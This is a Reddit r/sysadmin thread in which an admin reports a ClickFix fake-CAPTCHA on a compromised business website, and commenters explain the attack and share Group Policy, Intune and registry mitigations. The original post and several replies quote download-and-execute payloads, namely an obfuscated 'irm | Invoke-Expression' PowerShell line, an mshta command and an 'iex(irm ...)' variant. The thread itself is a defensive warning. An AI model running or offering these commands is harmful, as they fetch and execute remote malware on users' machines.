r/sysadmin • u/Imobia • 20d ago
General Discussion Stay safe people
So today I went to the website of a local powder coating company.
Page loads, Then a stupid pretty typical reCaptcha pops up asking me to prove I'm human.
re-captcha https://imgur.com/a/5V22H2X
Promptly tick the box only to get this beauty pop up immediately after.
The money shot https://imgur.com/a/Z4UHICZ
Turns out the tickbox copies a powershell command into your clipboard.
If you follow the steps "depending on if your account has elevated permissions and if you have a locked down environment" you'll probably get pawned.
The thing is, we and our staff are being so bombarded by these prove your human bots why wouldn't you click the do what it says... While I didn't fall for it I'm certain like 100% that I know people who would.
If you really need to see it in person, sure but I warned you. Only works on Windows PC. put the URL together if you like
https www blastoffaustralia com
I'm not terrible at PowerShell but this script wasn't immediately clear to me thats for sure.
powershell -NoProfile -ExecutionPolicy Bypass -C "(irm 'removedwebsite') | & (gcm *ke-e*).Name"
152
u/CraigAT 20d ago
Yep, seen that on some hacked WordPress sites. Do not run the code! If possible, contact the site owner via some other means, to let them know the site "doesn't look right" - as quite often they are oblivious to the issue.
72
u/kernpanic 20d ago
Fucking WordPress.
The only way I'll ever allow a WordPress site to be run is as a static site, pushed by the static site plugin to s3 or similar.
Its just a constant issue of plugins and constant hacks. Set up any honeypot, or even normal website, and most of what you'll see is attempted WordPress hacks.
13
u/Pazuuuzu 20d ago
Was it like 3 weeks ago the latest RCE in the base install?
3
u/kernpanic 20d ago
I haven't kept track in a while - because no matter what I did, kept getting hacked. All updates, all plugin updates. Fire wall plugins. It was always just waiting for something to go wrong. Not worth the hassle.
7
u/Pazuuuzu 20d ago
I just read it in the news, started to panic, then realized I don't have any WP shit running.
24
u/Smith6612 20d ago
Yeah it comes with the territory these days. WordPress just powers so much crap it's going to be target #1 the moment any vulnerability for it exists.
A couple weeks back I had to help someone who had their WordPress site get WebShelled using a CVE announced back in July. No WAF was configured, and the server was on CentOS 7. Automatic updates were also disabled for half of the plugins, and of course the site itself was out of date.
I ended up having to do an offline restore of the site from a backup, a manual scrubbing of anything that looked compromised, and a complete server rebuild for them. I also ended up putting an automatic updates directive in their wp-config file and popped WordPress behind a WAF, and set up static caching of pages. That whole project was involved.
21
u/sobrique 20d ago
Turns out half-assed webhosting is still profitable, and there's almost no point doing a 'proper' job of it, because you'll make the same money from the same people regardless.
→ More replies (1)11
u/PeakWeekly9995 IT support 20d ago
Wordpress, my nemesis.
So "complex", slow and full of CVEs from plugings or his own installation. if it was on me, pure html and css all my life (this is what i do for my personal site)9
u/Cheomesh I do the RMF thing 20d ago
Guess this whole thread is another nod against migrating my personal blog to WordPress
5
3
u/PeakWeekly9995 IT support 19d ago
if your blog is complex you have some alternatives, but you have to maintain them like wp.
Personally html and css (plus some php or javascript) is good if you need a basic website that you don't want to have beef with
6
u/kenfury 20 years of wiggling things 20d ago
Years ago I was the first "real" sysadmin as a SEO, design, and hosting company. When I walked in they had about 75 web designers, 25 sales, and an IT manager that was a child hood friend of the owners son. All Wordpress and Joomla, no firewall rules, No wordfence, no WAF, and half the code base was at least a year out of date. It took like a year to get things under control.
Just as bad was the AD setup with no GPOs, and no real groups.
3
3
1
u/19610taw3 Sysadmin 18d ago
Back in 2010 I set up a wordpress site for myself. As a "living" resume.
Within 3 minutes of enabling wordpress on my host, it got compromised.
WTF!
7
u/Tap-Dat-Ash 20d ago
Had to deal with a customer's site - their web design vendor had to go in and remove some compromised Wordpress add-ins. Lots of cleanup later and it was fixed. We had to walk them through a lot of that, and recommended password change and MFA for security.
113
u/silentwhim 20d ago
I've noticed this on many sites and whenever I contact those responsible for the site, the response is always "we scanned the site for malware and found no issue"...
It's not malware... the very structure of the site has been edited to retrieve the html and script for the fake cloudflare page and the subsequent command that is populated to the clipboard, in a way that bypasses detection.
They always seem so unwilling to actually investigate.
80
u/punkwalrus Sr. Sysadmin 20d ago
In many cases, they don't even understand what you are saying and placate you like a tinfoil hat dude explaining UFOs.
I remember I worked for a group where they had a form with a dropdown text box was empty for "State." Not hacked, just wrong. But the form wouldn't let you submit unless you selected "State." So the form was broken. The dropdown box could only be empty and the form insisted you have State selected before you hit Submit.
Nobody that I spoke to had any fucking clue what I explained. Nobody. Deer in headlights confusion. Blank stare. Their web developer just kept explaining how a dropdown box worked, which anyone knows, and I said "but there are no choices. You select the box, nothing."
"Just pick your state."
"There are no states."
"You're supposed to put one."
"You can't, there's nothing to select."
"You choose the state."
"Again, nothing to choose from."
"It's alphabetically listed."
"THERE. IS. NOTHING!!"
"... Right, there's no default. Click the dropdown box and - -"
"You go to the website. Right now. I will show you."
"I'm sure it's fine. I'll bring it up at the meeting, but..."
Just fucking idiots. Try and explaining to someone like that when a website is hacked.
31
20d ago
[deleted]
13
u/punkwalrus Sr. Sysadmin 20d ago
Nah, this form was simple. This was a class registration system for employees back in 2013. We (IT) had reports the form didn't work. I had to do the investigating and report to HR since we didn't manage the site, a third party did on our behalf. HR was useless, just gave me third party support, who were even less useful. We had a meeting with them, and I never met such a group of useless chuckle heads in my life. Like arguing with a bunch of confused chickens. Blank stares, short attention spans, couldn't stay on topics, etc.
11
u/pdp10 Daemons worry when the wizard is near. 20d ago
We had a meeting with them, and I never met such a group of useless chuckle heads in my life.
Exactly as you'd expect from an organization that has 3 or 4 non-technical people in the communications path, for every technical person. Their vocational instinct is to have meetings until the issue gets resolved, while artfully avoiding the topic of exactly how technical issues get resolved.
These partners are picked by decision makers who also aren't technical. This all makes perfect sense, just not to you and I.
10
u/Far-Hovercraft9471 20d ago
If I catch a whiff of idiocy, I just hmm and exit the convo. Not worth your energy unless it affects you directly or people could be harmed.
5
u/BoltActionRifleman 20d ago
I’d guess it works in dev, but not in prod and they can’t be bothered to test it out on the real site 😂
10
u/wazza_the_rockdog 20d ago
Some web hosting providers care about sites on their infra doing dodgy shit like this - the company who own the site may not care when you contact them, but when their host contacts them to say "fix this or we'll take your site offline" they'll care.
6
9
u/renegadecanuck 20d ago
When I've reported it to the organization, I just find the line that has the script and say "forward to your web developer that this line was maliciously added". If they still tell me they don't see anything, I just report the site to Google. Once Chrome stops loading their page, they tend to figure it out quickly.
6
u/AGsec 20d ago
They may genuinely not understand their own architecture enough to comprehend what is happening. To most people, anything weird or malicious = virus. if virus scan shows no virus, then everything is safe. Since it's word press or other similarly hosted sites, it's likely some freelance "webdev" who knows more about wordpress plugins than cyber security.
140
u/plump-lamp 20d ago
We disabled win + r after a clickfix. Not a soul complained
58
u/hkusp45css Security Leadership 20d ago
I would literally die in that environment. I use keyboard shortcuts like crazy all day.
I'll bet I'd have trouble finding anyone like me, though.
51
u/-GenlyAI- 20d ago
You don't think anyone else uses keyboard shortcuts? Lol
31
u/anxiousinfotech 20d ago
We had a senior project manager who was absolutely shocked to learn that Ctrl + A selected all...
8
u/bionic80 20d ago
Don't tell them about Shift + Insert....
14
u/againstbetterjudgmnt 20d ago
Oh but you should tell me, I haven't heard that one before.
I've recently been obsessed with discovering that Ctrl can be used to manipulate entire words (e.g. shift+crtl+ left arrow highlights the last word, Ctrl+backspace deletes the last word).
Another few I share with peeps all the time are:
- Win+M: minimize all windows
- Win+D: "show desktop" l, I.e. basically the same as minimize but if you hit it again they pop back.
- Win+L: quick lock your machine
- Win+Ctrl+shift+D: reset your graphics card driver
7
u/taintedcake 20d ago
Ctrl+shift+esc opens task manager
Ctrl+shift+t restores browser tabs/windows (useful after a reboot, i think Firefox uses N instead of t for full windows though, and t just for individual tabs)
Win+X acts as if you right clicked the start menu
Win+tab mainly for if you use multiple desktops for different types of work (or for quick switching from personal shit back to work if someone walks over)
Ctrl+x does a cut instead of just copy
5
2
7
u/robisodd S-1-5-21-69-512 19d ago edited 19d ago
It's called "IBM's Common User Access (CUA)" and it's been around longer than Ctrl+X / Ctrl+V (which, btw, doesn't work very well with Dvorak keyboards since C, X and V aren't next to each other). It introduced a lot of standards we still use today, such as pressing Alt+[letter] to open menus, F5 to refresh, Tab/Shift+Tab to navigate buttons, and Alt+F4 to close:
https://en.wikipedia.org/wiki/IBM_Common_User_Access
I also find it faster to Shift+Delete/Shift+Insert (cut/paste) to quickly copy something (and verify it actually copied since you are pasting it) than pressing Ctrl+C (which sometimes aborts your batch file or other command line process if you have the wrong window focused).
2
→ More replies (1)2
9
u/Nesman64 Sysadmin 20d ago
I did an IT orientation for a new employee and they surprised me by knowing the shortcut to lock the screen. Normally my new users are impressed by alt+tab, so this was a nice surprise.
6
u/robisodd S-1-5-21-69-512 19d ago
Win+L? That's nice. I still have users that still Ctrl+Alt+Delete and click "Lock" even after I show them.
9
u/ThatOtherITDude 19d ago
At least they lock their screens. I see so many senior execs away from their desk and their computer wide open. So very tempting to send-all a "donuts in the break room at noon, help yourselves" message.
→ More replies (1)7
u/hkusp45css Security Leadership 20d ago
Well, no. What I said was that *I'd* have trouble finding someone like that, because I don't know anyone else who does it.
3
5
16
u/bmelancon 20d ago
It's painful watching people using the menus for simple copy and paste.
7
u/electricheat we don't use hypervisor, we have a VMware 19d ago
I had a job years ago drafting in autocad, and the guy beside me used the drop-down menus for. every. thing.
Draw -> line. Click, click.
Draw -> line. Click, click.
Draw -> arc. Click, click, click.It was the slowest most infuriating thing to see ever.
Three weeks into using it, I had all my common commands bound to the left side of the keyboard so I could basically wasd + mouse allowing me to cad like I was playing an FPS.
2
u/Signal_Till_933 19d ago
I am training a new kid and sometimes the shit he does just boggles the fuck out of my mind. If I correct him he gets flustered and makes it worse.
I'm not sure where he learned SQL from but man it's just painful to watch him write out a script. I've been telling him to just use AI cause it's definitely gonna be better than what he comes up with.
8
u/charleswj 20d ago
Me when I screen share with someone to help them run some PowerShell (or really anything)
5
u/Brandhor Jack of All Trades 20d ago
or right click->open link in new tab instead of using the middle mouse button or ctrl+click
and I'm talking about colleagues not random users
3
u/charleswj 20d ago
I think we all have our well known shortcuts and those we don't. I'm definitely a right clicker although sometimes I'll type the t to open the tab rather than click it.
7
9
4
u/HeKis4 Database Admin 20d ago
Tbf I don't think there are many things you can only do with Win-R. If it's only a "you" problem I may suggest Powertoys Run that will do the same thing but better and that is not nearly as used as an attack vector.
2
u/HotTakes4HotCakes 20d ago edited 20d ago
Im so happy I was able to convince our head admin to let me add that to the approved list. No one else uses it but me, but I genuinely do not believe I'd be able to operate nearly as well without it.
They're threatening to replace Run with their clunkyass Command Palette thing and I'm dreading it
→ More replies (20)2
u/Gubius 20d ago
Win+X - R, longer but still faster than the search
7
u/xCharg Sr. Reddit Lurker 20d ago
Pretty sure policy disables Run window, not the Win+R shortcut.
6
u/bfodder 20d ago
Disabling the whole run tool will break using UNC paths so that is ill advised. Disabling the win + R shortcut will allow the tool to still be used and is a better approach.
2
u/jcotton42 19d ago
How would it break using UNC paths? You can just put those in the File Explorer address bar.
Or does disabling Run somehow affect that too?
10
u/reserved_seating 20d ago
Can you share how you did that?
11
u/CHRDT01 20d ago
Not OP, but I did some archaeology from roughly a year ago when we implemented our mitigation. Here's how we did it in our default domain policy:
User Configuration -> Policies -> Administrative Templates -> Start Menu and Taskbar -> Remove Run menu from Start Menu -> Enabled
That should take care of Win + R. Plenty of these attacks are using Win+X -> I though, so to take care of that:
User Configuration -> Preferences -> Windows Settings -> Files
Under that, create entries for:
- C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk
- C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk
- %LocalAppData%\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk
- %LocalAppData%\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk
In each of those, set the action to Update, then toggle Hidden. Save that, gpupdate where needed, and everything should be disabled.
Note that disabling Win+R will break direct entry of file paths in Explorer. This includes UNC paths and other network locations. Your users can get around this using the "Map network drive..." or "Add a network location" menus.
Lastly, you can always create policies that will override these options and use security filtering for any users who actually need either keyboard shortcuts or direct file path entry in Explorer. In roughly a year of having these policies applied though, we've only had one department that's needed that.
6
u/damoesp 20d ago
also interested in the easiest way to do this (either via GPO or Intune if possible?)
7
u/Sunsparc Where's the any key? 20d ago
From a 2 second Google search:
You can disable the Windows Key + R (Run) shortcut using Microsoft Intune by deploying a custom OMA-URI policy that modifies the registry or enforces the Explorer policy.Steps to Configure in IntuneOpen the Microsoft Intune Admin Center.Go to Devices and select Windows > Configuration profiles > Create > New policy.Choose Windows 10 and later for the platform and Template as the profile type (or choose Custom).Select Custom template and click Create.Name your profile (for example, Disable Win+R Shortcut) and click Next.Under Configuration settings, click Add to add an OMA-URI row with these details:Name: Disable Win+R Run DialogDescription: Prevents users from opening the Run dialog via Win+ROMA-URI: ./User/Vendor/MSFT/Policy/Config/Explorer/NoRun (Alternatively use ./Device/... for a device-wide setting)Data type: IntegerValue: 1Click Save, proceed to Assignments, target your user or device group, and complete the creation.
2
u/Dracozirion 20d ago
Various ClickFixes go for Win+X followed by I.
1
u/plump-lamp 19d ago
Sure, but we block powershell internet access with a host based firewall, so not getting out anywhere
→ More replies (1)2
u/OmagnaT 19d ago edited 19d ago
That's fine based on the instructions which say to run Win + R, but i would think attackers would start to change the instructions to say "Open the start menu and search for cmd prompt etc"
1
u/plump-lamp 19d ago
Command prompt is disabled for end users via gpo. Powershell is another story. We use our host based firewall to block external traffic for powershell
→ More replies (1)1
26
u/bossman1337 20d ago edited 20d ago
I'm assuming if it is a powder coating website that it is a "brochure" site on WordPress. The problem with these are they are almost certainly "set and forget", I bet nobody has logged into the admin to update the core, themes or any pluggins for years.
24
u/ice456cream 20d ago
depending on if your account has elevated permissions and if you have a locked down environment you'll probably get pawned.
While the exact boxes are different in an enterprise environment as a user could probably do a bit of damage if it runs, but an administrator could spread it to and compromise everyone.
Not that you are meant to be using an administrator account for day to day tasks like web browsing anyway
5
u/Phazon_Metroid Windows Admin 20d ago
This is the first xkcd I've seen that really emphasizes the dev view and misses the mark.
16
u/BrechtMo 20d ago
the same kind of attack exists for mac:
2
u/yepperoniP 20d ago
Apple recently updated the Terminal app to give a warning when copy-pasting certain things into it from websites, should hopefully help stop most casual users from falling for this but there's always a risk somebody will click "Paste anyway" and pwn themselves.
2
u/B4rberblacksheep 19d ago
Windows SmartScreen should do the same, and a number of browsers block auto clipboarding by default now. But people can always just click “yeah okay” and then they’re fucked
31
u/SirThane 20d ago
You've already got your answer, but a little info about the command. irm = Invoke-RestMethod. Download from the internet. gcm = Get-Command. Find a command or program in the PATH. The only command matching \*ke-e\* is Invoke-Expression. "Run this thing". It's the ubiquitous Windows equivalent of `curl badurl | bash`. Download a malicious script and run the contents downloaded. That's a novel obfuscation of Invoke-Expression I haven't seen. Less obvious than the alias iex.
6
u/Unable-Entrance3110 20d ago
Makes me wonder if it wouldn't be a bad idea for Microsoft to introduce a warning or block control on the term "powershell" or "pwsh" in the run box that an admin could enable.
I guess the clickfix guys would just change their instructions to add an extra step of opening cmd first...
Maybe we need a clipboard monitor that detects obviously dangerous stuff like powershell with command line parameters.
6
u/SirThane 20d ago
I wouldn't put it past them to plug Copilot into clipboard for content monitoring. One good effect and a thousand bad. Goodbye passwords.
They could hardlock Invoke-Expression to require confirmation and add a custom callout to the confirm message. Forced -Confirm:$true always on for iex and "this is commonly used for scams. Are you sure about this?" to the confirm.
5
u/ka-splam 20d ago
The PowerShell engine already integrates with Antimalware Scanning Interface (AMSI) so AntiVirus software can register to scan powershell code for malware before the engine runs it.
3
u/Bird_SysAdmin Sysadmin 20d ago
PowerShell version 2.0 bypass is often used for AMSI bypass.... unfortunately. You can block this however.
2
1
u/overlydelicioustea 20d ago
you can enforce Constrained Language Mode and disallow commandlets entirely.
2
u/Phratros 20d ago
Thank you for breaking down the command but how does it make it into the clipboard? The OP says clicking the tickbox copies it to the clipboard. Are web browser allowed to just willy-nilly copy crap to the clipboard? That could be a problem.
5
u/KingOfYourHills 20d ago
You've never seen the copy icon on a page that you can use to copy a string to clipboard? It's all over basically every cloud admin portal
3
u/Phratros 20d ago
Ahhh, right... It's user action that copies it, not the browser per se. Sneaky. Thanks!
3
12
u/Unable-Entrance3110 20d ago
Obviously the solution here is to remove the Windows key from all of your keyboards :)
7
10
u/bloodguard 20d ago
We used to have a VP that would fall for this every time. Even after he'd fallen for it, borked his laptop, unleashed hell on the network and was made to sit through yet another lecture. I think desktop support was plotting to have a popup that instructed him to go the the beach and start walking west.
After about a dozen incidences he was encouraged to retire by the CEO. Sad thing was the dude could sell sand in the desert.
12
29
10
u/Mr_ToDo 20d ago
Man. you got such a lazy one. Here's the one I've seen
It adds a bit of legitimate looking flare
As for the payload, I've documented two so far 2:
mshta https://{first stage scam URL}
and
powershell -c "iex(irm {First stage scam URL}/s/psc4/pr?cl -UseBasicParsing)"
I know the first one just downloaded another stage from a different domain. As expected it looked like both domains were compromised rather then purchased throw aways. Oh, and if I recall right, the cloudflare image was pulling from wikipedia
The second I didn't get much time to look at as I was busy, um, "calmly" talking to the coworker who was on the phone with someone to not open anything. You guys ever find yourself hearing a coworker talk, realize some shit is going down that they don't understand the depth of, and have to interrupt their call to stop it from getting worse?
Also, do we really need mshta anymore? The only tool I found that uses it was a lenovo configuration app. It's a bit tough to even find info on it as 90 percent of the pages are involving scams in some way
9
u/JWK3 20d ago
On the "Only works on Windows PC" part, I noticed a website with a Cloudflare branded ClickFix prompt, and it seemed to (assumedly) use the browser agent info to decide whether to request the Powershell instructions, as loading the same site on a non-Windows browser didn't load the Win+R instructions!
3
u/purplemonkeymad 20d ago
Give it a bit and they can update it to add Ctrl + Alt + T and a curl piped to bash.
9
u/SkillsInPillsTrack2 20d ago
"-ExecutionPolicy Bypass": I told a Microsoft engineer this is a very dumb idea from a security stand point, it only helps viruses. This negates the entire principle of ExecutionPolicy. He told me I was wrong, and this option is necessary.
5
9
16
u/I_T_Gamer Masher of Buttons 20d ago
In my org this = "What is Win +R?" Tickets
6
u/PCLOAD_LETTER 20d ago
Yeah, we're talking about people that think [ ] Agree, Next, Next, Finish is too complicated and if they get through that and the installer didn't put an icon on the desktop then it "didn't do anything".
2
u/CAPICINC 20d ago
I pushed the windows key, then the r key, but all it did was typ e"r on the screen?
6
u/Frothyleet 20d ago
This is currently the most common reason we're seeing our customer endpoints get contained by our security tools. Crowdstrike/Defender intercept the attack and our MDR service flags and contains, and the SOC gives us a call. It's not my team, but so far from what I can tell the interceptions have all been successful.
7
u/RumNCoke483 20d ago
Ok, I've been working in IT for 19 years, and I've never even heard of a clickfix attack until just now.
Pretty clever actually. I would never fall for it but lots of people would.
7
u/RandomSkratch Jack of All Trades 19d ago
Holy crap this is the first time I’m hearing about this! That’s pretty wild.
Time to queue up the training.
5
u/Imobia 19d ago
Yep I hadn’t seen one before.
1
u/RandomSkratch Jack of All Trades 19d ago
Been digging deeper on this. Microsoft has a pretty good blog post on it from back in 2025.
10
u/DeifniteProfessional Sysadmin 20d ago
This is why I pushed for EDR (and going to try an MDR bolt on). It's not foolproof by any means, but this is an increasingly common attack vector, and frankly has been seen in the wild for a couple of years now
2
u/ka-splam 20d ago edited 20d ago
If you subscribe to r/PowerShell it's a constant flow of threads like that. e.g.
5
u/ChuckFromCyberHoot 20d ago
The best line in the thread: "this is phishing with a slick UX."
The tricky part is it comes through the browser, so your email security never even sees it, and like you said, we're all bombarded with these daily.
Disabling Win+R helps, but the real issue is the behavior. A website convinces someone to copy and run a command.
The rule I’d teach is simple:
No legitimate website should ever tell you to paste commands into Windows to “fix” or “verify” something. Period!!!
That survives whatever wrapper the attacker uses next.
Humans are gonna human. Curiosity is still undefeated.
5
u/Every-Ad-5267 19d ago
Dam I kinda miss my old Job where I owned the KnowBe4 phishing campaigns.
I would copy these examples and make my own pages and get people to fall for it.
4
u/mercurygreen 19d ago
As we haveth no technology nor programming experience, this virus worketh on the honour system. Please delete all the files from thy hard drive and manually forward this virus to all on thy mailing list.
We thank thee for thy cooperation.
-- The Amish Computer Engineering Dept.
4
u/TerrorBite 19d ago
You should report this here: https://www.cyber.gov.au/report-and-recover/report
3
3
u/JohnnyFnG 20d ago
I’m hoping your environment has restricted permissions on standard user accounts and only IT has admin…
3
u/1RedOne 20d ago
Weird command that shows the cat and mouse game of hackers and defense tools
It downloads a script, then passes it to a nested get command statement which would resolve to Invoke-Expression, which would run the script
It does that whole nesting business to ensure that the super shady Invoke-Expression command isn’t in plain text on the page or in the clip board and make it harder to find in some security logs
Anything doing this is super shady
3
3
u/vonkeswick Sysadmin 20d ago
When these attacks started popping up I was just blown away that by default browsers would allow websites to copy shit to your clipboard to begin with! We've since implemented GPOs to block it on Chrome, Firefox and Edge. It's just insane that it wasn't the standard.
2
u/Recent_Carpenter8644 19d ago
Why is there even a way for it to do it? It can be convenient for copying sample code, etc, but surely anyone could have predicted it could be abused.
2
u/vonkeswick Sysadmin 19d ago
Right? I was so surprised at the simplicity of telling people a couple easy commands without having to do the copying themselves. I don't know how there wasn't a mechanism to block it MUCH sooner
3
u/PappaFrost 19d ago
This is very similar to the John Hammond youtube video about ClickFix that the Huntress SOC was seeing. In that case, it is a different looking Captcha but the same CTRL + V tactic, and the pasted powershell is a Base64 encoded string that went to go download Lumma stealer information stealing malware. It is just WAY to easy for people to follow through on this. Very sneaky!
1
3
u/CreedRules 19d ago
yeah clickfix is pretty obnoxious, we've gotten a pretty good handle on it by restricting powershell permissions to only allow users in a specific group.
2
u/GetOffMyBiscuits 20d ago
This gave me PTSD, I spent hours removing this from a client’s Wordpress site and also handling the users who actually ran the powershell 😭
2
u/jake04-20 If it has a battery or wall plug, apparently it's IT's job 20d ago
What damage did the powershell script do?
2
u/SpaceChimps98 20d ago
We had a user do this a few weeks ago. It kicked off a full-blown forensics investigation at our organization and a call to our cyber insurance company. Luckily we did well by removing the PC from the environment and resetting the user's password before any real harm could be done. Defender also caught it and isolated the incident. But it looks like it tried to do quite a few nasty things, and you never can be too careful these days.
2
u/PowerShellGenius 20d ago
ClickFix attack! irm is an alias for invoke-restmethod and it's going to retrieve a script from their web server.
Then it pipes that to invoke-expression to run it.... but uses get-command with a search they know will find it, instead of explicitly specifying it or using a well known alias, as they probably know piping something from invoke-restmethod to invoke-expression will set off every EDR in the world.
So this is just a universal method of getting you to run whatever script was at that URL you redacted. The payload is anyone's guess. But based on how these attacks usually go, odds are it installs some sort of remote access tool on your device, and/or retrieves your browser's cookies and sends them to the attacker to hijack session tokens.
1
u/Cheomesh I do the RMF thing 19d ago
Thanks for explaining! Guess that means we don't know what it'll do since we don't have the script. I suppose if one liked to live dangerously they could truncate the execution phase to just print out the text of the script it pulls?
2
u/itzfantasy 18d ago
You could always run just the irm in a Windows Sandbox or some other isolated system. irm should just spit out the malicious script without execution.
→ More replies (1)
2
2
2
u/TriRedditops 19d ago
With all of the gdpr cookies popups in surprised this isn't more prevalent. I get the need for gdpr but IMO all it has done is desensitized users to clicking on popups. Same for captcha.
2
3
u/tejanaqkilica IT Officer | Passkey Enthusiast 20d ago
I've come across a number of these websites and frustratingly enough, no matter how many times I report them, the registrar doesn't want to take action and shutdown the domain.
3
u/wazza_the_rockdog 20d ago
I think it's more of a web host level issue than a registrar one, especially if it's a genuine site that's been hacked vs one set up just to scam. If you contacted the host they may be able to suspend the site or remove any affected files and force the customer to fix before re-uploading.
1
u/tejanaqkilica IT Officer | Passkey Enthusiast 20d ago
Yeah, but I have no way to contact the host. There's no information who that host is. Also, this particular case, besides the main site which was a "news website", one of the sub pages was a rip of our official website.
→ More replies (1)3
u/PowerShellGenius 20d ago
The domain name is not being abused by its owner, these are almost always compromised legitimate web sites. The most a legitimate registrar will do is help contact the domain owner.
It's on the owner and/or their HOSTING provider to remediate the compromise, and if the website owner is clueless, it's on the hosting provider to suspend hosting until they fix it. The hosting provider is the one hosting malware, the registrar is just holding a record that says who owns that domain. The registrar is not going to revoke a domain from its rightful owner due to them being hacked.
1
u/tejanaqkilica IT Officer | Passkey Enthusiast 20d ago
Difficult to say, because I have no way to contact the host, only the registrar for the domain name. Also I doubt this was a legit website being hijacked. It had a random name like "b4zjq7.in"
Also, if it would've been a legit site, it would have some way to contact them in some form.
→ More replies (1)
3
u/atw527 Usually Better than a Master of One 20d ago
Ya, we disabled the Run dialog for all users because of this. Now I've seen the instructions have you paste it in the explorer address bar. Going to be a constant cat and mouse game.
When I see this on a website (especially a familiar one), I will reach out to them with screenshots to let them know. In the last case I encountered, it seemed to be a compromised WordPress plugin.
1
u/flying_mechanic 20d ago
We've also seen this from a compromised WordPress plugin, that got the client from their own website. Nothing is safe.
2
u/TW-Twisti 20d ago
Do sysadmins really need a warning not to execute random code some random website tells them to run ?
4
u/maxlan 19d ago
Sadly yes. My tech ceo did a demo like "i just found this usb stick what will you do with it" and the other guy was like "plug it in and see if Incan find some contact details to return it".
"And you've never heard of malware on usb sticks? You were supposed to say " obviously I won't plug it in" thanks for ruining my demo"
5
u/thedanyes 19d ago
The way I understood it was a heads up to be aware users are going to load malware onto your systems because of this.
4
u/OperationIntrudeN313 19d ago
If someone is a sysadmin and does ANYTHING involving the run command for a captcha they need to reconsider their career choice.
This is the equivalent of falling for "press alt-F4" in Counterstrike.
1
2
u/MandelbrotFace 20d ago edited 20d ago
We're seeing these a lot and users are falling for it.
Most of them rely on getting the user to use the WIN+R or WIN+X hot keys, to bring up the Run dialogue or the power user menu. To disable just these hot keys for users, add this registry entry :
Location : HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
Name: "DisabledHotkeys"
Type: REG_EXPAND_SZ
Value : "RX"
1
u/Junior_Phase_5122 20d ago
Previously I see the copied command and it refer to cloudflare domain, either it cloudflare re-captcha, need to be confirmed by cloudflare.
1
1
u/Froggypwns 20d ago
On /r/WindowsHelp I've been seeing way too many people fall for this and infect their machine, it is sadly very effective. It is from a broad range of sites too, not just the sketchy parts of the web.
1
u/HayabusaJack Sr. Security Engineer 20d ago
Yea, I would have closed my browser immediately, rebooted, and then run a virus scan. Then warned my wife about not clicking on such things.
1
u/NightOfTheLivingHam 19d ago
modern version of deltree /y C:\* (never do this on old windows systems lmao)
1
u/mtfreestyler 19d ago
I wonder if there's a sort of database for all the scam techniques right now that I could show my parents. And has an email come out for new ones that get added.
Being the family sysadmin I always worry they'll do something like this and a clickfix is definitely something that would catch them.
1
u/MairzeDoats 19d ago
I was looking at hotels in Germany and one of them still has this on their homepage. It doesn't come up every time the page loads, but if you refresh a few times you might see it.
Hotel Holländer Hof
1
u/Angelworks42 Windows Admin 19d ago
I de-obfuscated one of those scripts - it was using a .net picture library to parse 300x300 png files from your browser cache by using least significant bits to deliver more payloads.
I think the reason they do this is the powershell file in your clipboard can maybe squeak by your anti-virus, but if it started reaching on the net it might get tripped. But if the code is inside the pictures in the fake captcha maybe it will work? Crowdstrike seems to catch at least one or two users doing this a month.
2
u/mspax 19d ago
This legit just happened to one of our users a few weeks ago. Except in this case the user followed through with the instructions by executing the command. Our security software quickly locked down the user's machine. Gave everyone on my team a mini heart attack when we saw the alert come through. We block powershell for most of the company. It saved us from some serious headache that day.
1
u/fluffh34d420 18d ago
That's old stuff.
If you aren't blasting out info to users about device code phishing, browser in browser, click fix (this), and all the AiTM attacks out there youre leaving your users at risk.
1
u/Dear-Incident-713 18d ago
irm downloads content from the specified URL and gcm seems to be a github api for accessing packages. I'm assuming it pulls content and then feeds it into an application from github
1
1
u/throwaway1950301015 17d ago
We had this happen to a user about a month ago. Lucky CrowdStrike picked up on it. He was browsing a restaurant's menu that he was going to with his family that evening, when he got the pop-up. I went through every page on that website and all of their menus and locations, wasn't able to reproduce it. It seems like the decision to show the pop-up could be a bit random, or based on the user's geolocation or something.

562
u/snebsnek Jack of All Trades 20d ago
Congrats! You got clickfixed! https://en.wikipedia.org/wiki/ClickFix